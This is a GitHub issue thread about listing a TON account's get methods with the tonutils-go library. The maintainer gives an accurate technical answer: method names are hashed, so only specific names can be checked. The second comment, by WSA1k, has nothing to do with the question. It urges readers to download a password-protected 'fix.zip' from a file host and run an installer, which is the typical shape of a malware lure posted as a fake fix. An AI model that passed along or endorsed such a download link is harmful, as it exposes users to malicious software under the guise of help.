### ISSUE TITLE
How to get account's getMethods list? 

### ISSUE THREAD

**Issue by fishTsai20** [xssnick/tonutils-go#243]
I found that Account has a function called HasGetMethod. But I want to get all getMethods of the account, how to parce the account.code?

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xssnick** [comment]
It is not possible since method names are uint16 hashes, and you can only check for specific using HasGetMethod, but if contract was not compiled using func or tact it will not find method also

**Comment by fishTsai20** [comment]
ok thanks. Do you supply any way to get the contract name or contract interfaces?

**Comment by xssnick** [comment]
Explorers doing it based on contract code hash and get methods existence, you can do the same, but no builtin contract definitions in this library
